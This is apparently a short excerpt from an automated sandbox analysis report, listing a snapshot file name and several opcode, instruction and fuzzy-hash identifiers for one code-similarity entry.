                                                                                                                • Snapshot File: hcaresult_0_3_18b8000_FjFeChttqA.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: n
                                                                                                                • API String ID: 0-2013832146
                                                                                                                • Opcode ID: 5ef7f82e42e7ef0a230e79c6371041d7da2ec8e211e0495c59d0d439b05ef74e
                                                                                                                • Instruction ID: 8694aff5cd781e6b8dbffc125c5855ba8661385cccbf37094aa5182087089452
                                                                                                                • Opcode Fuzzy Hash: 5ef7f82e42e7ef0a230e79c6371041d7da2ec8e211e0495c59d0d439b05ef74e
                                                                                                                • Instruction Fuzzy Hash: 0502545104E7C15FC7238B304DBA6A2BFB16E5321471E86CFD5C18F4B3D24A9A4AE362